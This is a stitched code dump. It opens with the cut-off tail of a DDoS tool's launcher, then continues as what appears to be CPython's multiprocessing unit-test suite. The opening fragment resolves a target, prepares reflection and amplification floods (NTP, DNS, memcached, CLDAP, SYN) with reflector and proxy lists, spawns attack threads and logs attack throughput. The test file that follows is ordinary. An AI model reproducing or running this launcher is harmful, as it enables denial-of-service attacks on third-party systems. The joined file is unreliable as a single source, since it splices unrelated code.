referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
